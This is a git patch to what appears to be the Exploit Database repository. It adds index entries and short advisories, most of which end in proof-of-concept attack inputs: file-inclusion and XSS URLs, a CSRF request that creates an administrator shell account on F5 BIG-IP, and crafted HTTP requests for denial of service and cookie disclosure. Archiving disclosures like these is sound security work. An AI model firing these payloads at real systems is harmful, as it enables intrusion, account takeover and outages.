From 5de5e59242b6f3114a71a50836c31e6a3dffa387 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 23 Jan 2014 04:26:27 +0000 Subject: [PATCH] Updated 01_23_2014 --- files.csv | 29 ++++ platforms/asp/webapps/31117.txt | 9 + platforms/hardware/remote/31133.txt | 9 + platforms/linux/remote/31127.txt | 9 + platforms/multiple/dos/31128.txt | 19 +++ platforms/multiple/remote/31130.txt | 19 +++ platforms/php/webapps/31107.txt | 9 + platforms/php/webapps/31108.txt | 9 + platforms/php/webapps/31109.txt | 9 + platforms/php/webapps/31110.txt | 9 + platforms/php/webapps/31111.txt | 10 ++ platforms/php/webapps/31112.txt | 15 ++ platforms/php/webapps/31115.txt | 9 + platforms/php/webapps/31116.txt | 9 + platforms/php/webapps/31120.txt | 16 ++ platforms/php/webapps/31121.txt | 7 + platforms/php/webapps/31123.txt | 9 + platforms/php/webapps/31124.txt | 9 + platforms/php/webapps/31125.txt | 9 + platforms/php/webapps/31126.txt | 9 + platforms/php/webapps/31129.txt | 7 + platforms/php/webapps/31131.txt | 11 ++ platforms/php/webapps/31134.txt | 9 + platforms/php/webapps/31135.txt | 8 + platforms/php/webapps/31137.txt | 7 + platforms/windows/dos/31114.txt | 25 +++ platforms/windows/dos/31138.txt | 9 + platforms/windows/dos/31139.txt | 9 + platforms/windows/remote/31113.html | 45 +++++ platforms/windows/remote/31118.c | 249 ++++++++++++++++++++++++++++ 30 files changed, 611 insertions(+) create mode 100755 platforms/asp/webapps/31117.txt create mode 100755 platforms/hardware/remote/31133.txt create mode 100755 platforms/linux/remote/31127.txt create mode 100755 platforms/multiple/dos/31128.txt create mode 100755 platforms/multiple/remote/31130.txt create mode 100755 platforms/php/webapps/31107.txt create mode 100755 platforms/php/webapps/31108.txt create mode 100755 platforms/php/webapps/31109.txt create mode 100755 platforms/php/webapps/31110.txt create mode 100755 platforms/php/webapps/31111.txt create mode 100755 platforms/php/webapps/31112.txt create mode 100755 platforms/php/webapps/31115.txt create mode 100755 platforms/php/webapps/31116.txt create mode 100755 platforms/php/webapps/31120.txt create mode 100755 platforms/php/webapps/31121.txt create mode 100755 platforms/php/webapps/31123.txt create mode 100755 platforms/php/webapps/31124.txt create mode 100755 platforms/php/webapps/31125.txt create mode 100755 platforms/php/webapps/31126.txt create mode 100755 platforms/php/webapps/31129.txt create mode 100755 platforms/php/webapps/31131.txt create mode 100755 platforms/php/webapps/31134.txt create mode 100755 platforms/php/webapps/31135.txt create mode 100755 platforms/php/webapps/31137.txt create mode 100755 platforms/windows/dos/31114.txt create mode 100755 platforms/windows/dos/31138.txt create mode 100755 platforms/windows/dos/31139.txt create mode 100755 platforms/windows/remote/31113.html create mode 100755 platforms/windows/remote/31118.c diff --git a/files.csv b/files.csv index f96bcf99e..a1e1627e6 100755 --- a/files.csv +++ b/files.csv @@ -27932,3 +27932,32 @@ id,file,description,date,author,platform,type,port 31103,platforms/asp/webapps/31103.txt,"AstroSoft HelpDesk operator/article/article_search_results.asp txtSearch Parameter XSS",2008-02-04,"Alexandr Polyakov",asp,webapps,0 31104,platforms/asp/webapps/31104.txt,"AstroSoft HelpDesk operator/article/article_attachment.asp Attach_Id Parameter XSS",2008-02-04,"Alexandr Polyakov",asp,webapps,0 31105,platforms/windows/dos/31105.py,"Titan FTP Server 6.05 build 550 DELE Command Remote Buffer Overflow Vulnerability",2008-02-04,j0rgan,windows,dos,0 +31107,platforms/php/webapps/31107.txt,"Portail Web Php 2.5.1 config/conf-activation.php site_path Parameter Remote File Inclusion",2008-02-04,Psiczn,php,webapps,0 +31108,platforms/php/webapps/31108.txt,"Portail Web Php 2.5.1 menu/item.php site_path Parameter Remote File Inclusion",2008-02-04,Psiczn,php,webapps,0 +31109,platforms/php/webapps/31109.txt,"Portail Web Php 2.5.1 modules/conf_modules.php site_path Parameter Remote File Inclusion",2008-02-04,Psiczn,php,webapps,0 +31110,platforms/php/webapps/31110.txt,"Portail Web Php 2.5.1 system/login.php site_path Parameter Remote File Inclusion",2008-02-04,Psiczn,php,webapps,0 +31111,platforms/php/webapps/31111.txt,"Download Management 1.00 for PHP-Fusion Multiple Local File Include Vulnerabilities",2008-02-05,Psiczn,php,webapps,0 +31112,platforms/php/webapps/31112.txt,"DevTracker Module For bcoos 1.1.11 and E-xoops 1.0.8 Multiple Cross-Site Scripting Vulnerabilities",2008-02-04,Lostmon,php,webapps,0 +31113,platforms/windows/remote/31113.html,"GlobalLink 2.6.1.2 'HanGamePlugincn18.dll' ActiveX Control Multiple Buffer Overflow Vulnerabilities",2008-02-05,anonymous,windows,remote,0 +31114,platforms/windows/dos/31114.txt,"Adobe Acrobat and Reader <= 8.1.1 Multiple Arbitrary Code Execution and Security Vulnerabilities",2008-02-06,"Paul Craig",windows,dos,0 +31115,platforms/php/webapps/31115.txt,"MyNews 1.6.x 'hash' Parameter Cross Site Scripting Vulnerability",2008-02-06,SkyOut,php,webapps,0 +31116,platforms/php/webapps/31116.txt,"Pagetool 1.07 'search_term' Parameter Cross-Site Scripting Vulnerability",2008-02-06,Phanter-Root,php,webapps,0 +31117,platforms/asp/webapps/31117.txt,"WS_FTP Server 6 /WSFTPSVR/FTPLogServer/LogViewer.asp Authentication Bypass",2008-02-06,"Luigi Auriemma",asp,webapps,0 +31118,platforms/windows/remote/31118.c,"Microsoft Works 8.0 File Converter Field Length Remote Code Execution Vulnerability",2008-02-06,"Luigi Auriemma",windows,remote,0 +31120,platforms/php/webapps/31120.txt,"MODx 0.9.6 index.php Multiple Parameter XSS",2008-02-07,"Alexandr Polyakov",php,webapps,0 +31121,platforms/php/webapps/31121.txt,"Joomla! and Mambo com_sermon 0.2 Component 'gid' Parameter SQL Injection Vulnerability",2008-02-07,S@BUN,php,webapps,0 +31123,platforms/php/webapps/31123.txt,"PowerScripts PowerNews 2.5.6 'subpage' Parameter Multiple Local File Include Vulnerabilities",2008-02-08,"Alexandr Polyakov",php,webapps,0 +31124,platforms/php/webapps/31124.txt,"Calimero.CMS 3.3 'id' Parameter Cross Site Scripting Vulnerability",2008-02-08,Psiczn,php,webapps,0 +31125,platforms/php/webapps/31125.txt,"Joovili 2.1 'members_help.php' Remote File Include Vulnerability",2008-02-08,Cr@zy_King,php,webapps,0 +31126,platforms/php/webapps/31126.txt,"Serendipity Freetag-plugin 2.95 'style' parameter Cross Site Scripting Vulnerability",2008-02-08,"Alexander Brachmann",php,webapps,0 +31127,platforms/linux/remote/31127.txt,"Mozilla Firefox <= 2.0.9 'view-source:' Scheme Information Disclosure Vulnerability",2008-02-08,"Ronald van den Heetkamp",linux,remote,0 +31128,platforms/multiple/dos/31128.txt,"Multiple IEA Software Products HTTP POST Request Denial of Service Vulnerability",2008-02-08,"Luigi Auriemma",multiple,dos,0 +31129,platforms/php/webapps/31129.txt,"Managed Workplace Service Center 4.x/5.x/6.x Installation Information Disclosure Vulnerability",2008-02-08,"Brook Powers",php,webapps,0 +31130,platforms/multiple/remote/31130.txt,"Apache Tomcat <= 6.0.15 Cookie Quote Handling Remote Information Disclosure Vulnerability",2008-02-09,"John Kew",multiple,remote,0 +31131,platforms/php/webapps/31131.txt,"PK-Designs PKs Movie Database 3.0.3 'index.php' SQL Injection and Cross-Site Scripting Vulnerabilities",2008-02-09,Houssamix,php,webapps,0 +31133,platforms/hardware/remote/31133.txt,"F5 BIG-IP 9.4.3 Web Management Interface Cross-Site Request Forgery Vulnerability",2008-02-11,nnposter,hardware,remote,0 +31134,platforms/php/webapps/31134.txt,"VWar 1.5 'calendar.php' SQL Injection Vulnerability",2008-02-11,Pouya_Server,php,webapps,0 +31135,platforms/php/webapps/31135.txt,"Rapid-Source Rapid-Recipe Component Multiple SQL Injection Vulnerabilities",2008-02-11,breaker_unit,php,webapps,0 +31137,platforms/php/webapps/31137.txt,"Joomla! and Mambo com_comments Component 0.5.8.5g 'id' Parameter SQL Injection Vulnerability",2008-02-11,CheebaHawk215,php,webapps,0 +31138,platforms/windows/dos/31138.txt,"Larson Network Print Server 9.4.2 build 105 (LstNPS) NPSpcSVR.exe License Command Remote Overflow",2008-02-11,"Luigi Auriemma",windows,dos,0 +31139,platforms/windows/dos/31139.txt,"Larson Network Print Server 9.4.2 build 105 (LstNPS) Logging Function USEP Command Remote Format String",2008-02-11,"Luigi Auriemma",windows,dos,0 diff --git a/platforms/asp/webapps/31117.txt b/platforms/asp/webapps/31117.txt new file mode 100755 index 000000000..efb0f2b76 --- /dev/null +++ b/platforms/asp/webapps/31117.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/27654/info + +WS_FTP Server Manager is prone to an authentication-bypass vulnerability and an information-disclosure vulnerability. + +An attacker can exploit these issues to gain unauthorized access to the affected application and gain access to potentially sensitive information. + +These issues affect WS_FTP Server Manager 6.1.0.0; prior versions may also be affected. + +http://www.example.com/WSFTPSVR/FTPLogServer/LogViewer.asp \ No newline at end of file diff --git a/platforms/hardware/remote/31133.txt b/platforms/hardware/remote/31133.txt new file mode 100755 index 000000000..e686684c2 --- /dev/null +++ b/platforms/hardware/remote/31133.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/27720/info + +F5 BIG-IP is prone to a cross-site request-forgery vulnerability. + +Exploiting this issue may allow a remote attacker to execute arbitrary actions on an affected device. + +F5 BIG-IP 9.4.3 is vulnerable; other versions may also be affected. + +https://www.example.com/tmui/Control/form?handler=%2Ftmui%2Fsystem%2Fbigpipe%2Fbigpipe&handler_before=&form_page=%2Ftmui%2Fsystem%2Fbigpipe%2Fbigpipe.jsp%3F&form_page_before=&bigpipe_output=&bigpipe_cmd_validation=NO_VALIDATION&bigpipe_cmd_before=&bigpipe_cmd=user+testuser+password+none+testpwd+shell+%2Fbin%2Fbash+role+administrator+in+all \ No newline at end of file diff --git a/platforms/linux/remote/31127.txt b/platforms/linux/remote/31127.txt new file mode 100755 index 000000000..f01a62b85 --- /dev/null +++ b/platforms/linux/remote/31127.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/27700/info + +Mozilla Firefox is prone to an information-disclosure vulnerability because it fails to restrict access to local resources. + +Attackers can exploit this issue to obtain potentially sensitive information that will aid in further attacks. + +Firefox 2.0.0.12 and prior versions are vulnerable. + + \ No newline at end of file diff --git a/platforms/multiple/dos/31128.txt b/platforms/multiple/dos/31128.txt new file mode 100755 index 000000000..0bd71bde7 --- /dev/null +++ b/platforms/multiple/dos/31128.txt @@ -0,0 +1,19 @@ +source: http://www.securityfocus.com/bid/27701/info + +Multiple IEA Software products are prone to a denial-of-service vulnerability. + +Successfully exploiting this issue will allow attackers to crash the affected application, denying service to legitimate users. + +This issue affects the following applications: + +- Emerald 5.0.49 and prior versions +- RadiusNT and RadiusX 5.1.38 and prior versions +- Radius test client 4.0.20 and prior versions +- Air Marshal 2.0.4 and prior versions + +The following proof-of-concept exploit code is available: + +POST / HTTP/1.0 +Host: localhost +Content-Length: 2147483647 + diff --git a/platforms/multiple/remote/31130.txt b/platforms/multiple/remote/31130.txt new file mode 100755 index 000000000..484e8ed9f --- /dev/null +++ b/platforms/multiple/remote/31130.txt @@ -0,0 +1,19 @@ +source: http://www.securityfocus.com/bid/27706/info + +Apache Tomcat is prone to an information-disclosure vulnerability because it fails to adequately sanitize user-supplied data. + +Attackers can exploit this issue to access potentially sensitive data that may aid in further attacks. + +Versions prior to Apache Tomcat 6.0.16 and 5.5.26 are vulnerable. + +NOTE: This vulnerability is caused by an incomplete fix for BID 25316 - Apache Tomcat Multiple Remote Information Disclosure Vulnerabilities (CVE-2007-3385). + ++++ +GET /myapp/MyCookies HTTP/1.1 +Host: localhost +Cookie: name="val " ue" +Cookie: name1=moi ++++ + +http://www.example.com/examples/servlets/servlet/CookieExample?cookiename=test&cookievalue=test%5c%5c%22%3B+Expires%3DThu%2C+1+Jan+2009+00%3A00%3A01+UTC% +3B+Path%3D%2Fservlets-examples%2Fservlet+%3B \ No newline at end of file diff --git a/platforms/php/webapps/31107.txt b/platforms/php/webapps/31107.txt new file mode 100755 index 000000000..3de3d5548 --- /dev/null +++ b/platforms/php/webapps/31107.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/27616/info + +Portail Web Php is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +These issues affect Portail Web Php 2.5.1.1; other versions may also be affected. + +http://www.example.com/path/admin/system/config/conf-activation.php?site_path=http://www.example2.com \ No newline at end of file diff --git a/platforms/php/webapps/31108.txt b/platforms/php/webapps/31108.txt new file mode 100755 index 000000000..495728ddb --- /dev/null +++ b/platforms/php/webapps/31108.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/27616/info + +Portail Web Php is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +These issues affect Portail Web Php 2.5.1.1; other versions may also be affected. + +http://www.example.com/path/admin/system/menu/item.php?site_path=http://www.example2.com diff --git a/platforms/php/webapps/31109.txt b/platforms/php/webapps/31109.txt new file mode 100755 index 000000000..2c6dedaf6 --- /dev/null +++ b/platforms/php/webapps/31109.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/27616/info + +Portail Web Php is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +These issues affect Portail Web Php 2.5.1.1; other versions may also be affected. + +http://www.example.com/path/admin/system/modules/conf_modules.php?site_path=http://www.example2.com \ No newline at end of file diff --git a/platforms/php/webapps/31110.txt b/platforms/php/webapps/31110.txt new file mode 100755 index 000000000..282c4c613 --- /dev/null +++ b/platforms/php/webapps/31110.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/27616/info + +Portail Web Php is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +These issues affect Portail Web Php 2.5.1.1; other versions may also be affected. + +http://www.example.com/path/system/login.php?site_path=http://www.example2.com \ No newline at end of file diff --git a/platforms/php/webapps/31111.txt b/platforms/php/webapps/31111.txt new file mode 100755 index 000000000..6d6e3abf3 --- /dev/null +++ b/platforms/php/webapps/31111.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/27618/info + +Download Management for PHP-Fusion is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. + +Exploiting these issues may allow an attacker to access potentially sensitive information and execute arbitrary local scripts in the context of the affected application. + +These issues affect Download Management 1.00; other versions may also be vulnerable. + +http://example.com/infusions/download_management/infusion.php?settings[locale]=LFI%00 +http://example.com/infusions/download_management/download_management.php?settings[locale]=LFI%00 \ No newline at end of file diff --git a/platforms/php/webapps/31112.txt b/platforms/php/webapps/31112.txt new file mode 100755 index 000000000..001079122 --- /dev/null +++ b/platforms/php/webapps/31112.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/27619/info + +DevTracker module for bcoos and E-xoops is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +These issues affect the following versions: + +bcoos 1.1.11 (and earlier) with DevTracker 3.0 +E-xoops 1.0.8 (and earlier) with DevTracker v0.20 + +Other versions may also be vulnerable. + +http://www.example.com/modules/devtracker/index.php?proj_id=1&order_by=priority&direction=ASCquot;> +http://www.example.com/modules/devtracker/index.php?proj_id=1&order_by=priorityquot;>&direction=ASC \ No newline at end of file diff --git a/platforms/php/webapps/31115.txt b/platforms/php/webapps/31115.txt new file mode 100755 index 000000000..77ce82058 --- /dev/null +++ b/platforms/php/webapps/31115.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/27652/info + +MyNews is prone to a cross-site scripting vulnerability. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +MyNews 1.6.4 and prior versions are vulnerable. + +http://www.example.com/index.php?hash=">